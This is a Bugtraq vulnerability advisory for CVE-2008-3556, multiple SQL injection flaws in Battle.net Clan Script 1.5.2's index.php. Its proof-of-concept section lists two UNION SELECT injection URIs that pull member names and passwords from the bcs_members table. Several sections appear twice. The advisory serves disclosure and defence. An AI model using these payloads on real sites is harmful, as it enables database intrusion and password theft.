Battle.net Clan Script 'index.php' Multiple SQL Injection Vulnerabilities
BID:30565
Info
Battle.net Clan Script 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30565 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3556 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 06 2008 12:00AM |
| Updated: | May 07 2015 05:25PM |
| Credit: | IRCRASH (R3d.W0rm (Sina Yazdanmehr)) |
| Vulnerable: |
Battle.net Clan Script Battle.net Clan Script 1.5.2 Battle.net Clan Script Battle.net Clan Script 1.5.1 Battle.net Clan Script Battle.net Clan Script 1.5 |
| Not Vulnerable: | |
Discussion
Battle.net Clan Script 'index.php' Multiple SQL Injection Vulnerabilities
Battle.net Clan Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Battle.net Clan Script 1.5.2 is vulnerable; other versions may also be affected.
Battle.net Clan Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Battle.net Clan Script 1.5.2 is vulnerable; other versions may also be affected.
Exploit / POC
Battle.net Clan Script 'index.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/*
http://www.example.com/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/*
http://www.example.com/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*
Solution / Fix
Battle.net Clan Script 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Battle.net Clan Script 'index.php' Multiple SQL Injection Vulnerabilities
References:
References:
- Battle.net Clan Script Project Page (Battle.net Clan Script)
- MyClan Sql Injection ([email protected])